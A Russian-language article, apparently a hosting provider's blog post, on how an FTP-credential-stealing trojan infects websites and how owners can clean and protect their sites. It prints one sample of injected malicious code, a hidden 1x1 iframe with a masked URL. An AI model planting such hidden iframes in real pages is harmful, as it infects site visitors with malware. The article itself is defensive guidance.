Вам никогда не приходилось при попытке зайти на какой-нибудь сайт наткнуться на предостережение вашего браузера (например, «Внимание! Посещение этого сайта может нанести вред вашему компьютеру!») или антивируса?
Наверняка приходилось, и не раз. И вдруг однажды вы наблюдаете подобную ситуацию при попытке зайти на ваш собственный сайт. Что, собственно, происходит? Ваш сайт заражен вирусом.
Как правило, зараженный компьютер используется или для рассылки спама, или как узел ботнета (т.н. «зомби») — в качестве прокси или атакующего элемента. Теоретически, владельцем зараженного компьютера, с которого осуществляются деструктивные действия, со временем могут заинтересоваться правоохранительные органы.
Как это работает?
Если присмотреться к исходному коду зараженной страницы вашего сайта, можно без труда обнаружить код, который вы явно туда не добавляли. Выглядеть он будет примерно так:
<iframe src=»http://**********» width=1 height=1 style=»visibility:hidden;position:absolute»></iframe>
Этот код является замаскированной, невидимой при просмотре страниц ссылкой на скачивание вируса, работающего по принципу троянского коня. Попадая на ваш компьютер, «троянец» начинает систематично «коллекционировать» данные для входа на аккаунты FTP, которые вы храните в настройках ваших FTP-клиентов — Проводника MS Windows, CuteFTP, Total Commander, пр. Получив данные для входа, вирус соединяется с этими аккаунтами и начинает искать индексные файлы размещаемых сайтов — index.htm, index.html, index.php, default.html и прочие. В найденные файлы он дописывает строку, которую вы видите выше — то есть, ссылку на скачивание самого себя. Так замыкается порочный круг распространения вируса: теперь все посетители вашего сайта, заходящие на главную его страницу, рискуют заразиться. И кто же виноват? Ваш хостинг-провайдер? Отнюдь, хостинг-провайдер не виноват. Виноваты — вы.
Фокус в том, что ваш хостинг никто не ломал. Вирус распространяется, совершая заход на ваш хостинговый аккаунт под совершенно легально созданной учетной записью, данные которой он находит сохраненными в ваших FTP-клиентах.
«Как-то не верится, что взлома не было…»
В отдельных случаях взлом-таки бывает. Правда, взламывают не аккаунт хостинга: заражение сайта происходит через уязвимость в скриптах системы управления вашим сайтом (CMS) или ее расширений. Однако и в этом случае вины хостинг-провайдера нет: на уязвимости в размещаемых на его серверах сайтах он никак влиять не может. Своевременное обновление версии используемого вами программного обеспечения — это исключительно ваша забота.
Остается только одно: как и при заражении любым другим вирусом — лечиться.
Первым делом необходимо установить на ваш компьютер хороший антивирус с самой новой вирусной базой. Проверьте ваш компьютер как следует: наверняка антивирус найдет много вещей, которые вас неприятно удивят. По завершении проверки, убедившись, что ваш компьютер «чист», смените пароли на всех ваших аккаунтах FTP, и сделайте так, чтобы новый пароль не сохранялся в ваших FTP-клиентах! Загрузите на сервер резервную копию вашего сайта, убедившись предварительно, что файлы в ней не заражены вирусом. Если локальной копии сайта у вас не имеется, обратитесь к хостинг-провайдеру с просьбой такую копию предоставить: если вы заметили изменения в вашем сайте оперативно, незараженная копия у вашего хостера наверняка имеется.
Обновите вашу CMS и используемые в ней расширения (plugins). Удалите расширения, назначения которых вы не знаете, или историю появления которых вы не можете вспомнить.
Если же вы заметили проблему не сразу, а по прошествии значительного времени, и ни у вас, ни у хостинг-провайдера уже нет незараженной копии вашего сайта, сайт нужно «лечить» — тщательно искать все вхождения вредоносного кода и руками их удалять. У некоторых хостинг-провайдеров есть специально написанный скрипт для автоматизции этой процедуры: обратитесь в службу поддержки, скорее всего, вам помогут.
А можно как-нибудь избежать заражения?
Можно основательно минимизировать риск заражения, если соблюсти ряд несложных условий:
- Не пренебрегайте антивирусами;
- Ежедневно обновляйте антивирусные базы;
- Не сохраняйте пароли в программах, которые вы используете для работы с FTP: вводите пароль руками при каждом новом заходе;
- Убедитесь, что ваш хостинг-провайдер осуществляет регулярное резервное копирование вашего сайта и сохраняет копии за несколько последних дней;
- Не ленитесь не реже одного раза в месяц скачивать на локальный компьютер резервную копию вашего сайта;
- Обновляйте используемую вами CMS, используйте только актуальные версии;
- Обновляйте используемые вами расширения для CMS;
- Не используйте расширения и скрипты, взятые из непроверенных источников;
- Ограничьте список IP-адресов, с которых разрешено соединяться с вашим аккаунтом FTP.
Для этого создайте в домашней директории (директории самого верхнего уровня на вашем аккаунте) файл .ftpaccess следующего вида:
<Limit ALL>
Allow from 127.0.0.1
Deny from all
</Limit>
Вместо 127.0.0.1 укажите IP-адрес (или список адресов), с которого Вы работаете с вашим аккаунтом FTP. Ваш IP-адрес вы можете узнать, воспользовавшись, например, вот этим сервисом.
Как видите, уберечься от угрозы абсолютно не сложно. Желаем вашим сайтам «здоровья», а вам — спокойствия!






Опубликовано в рубрике 
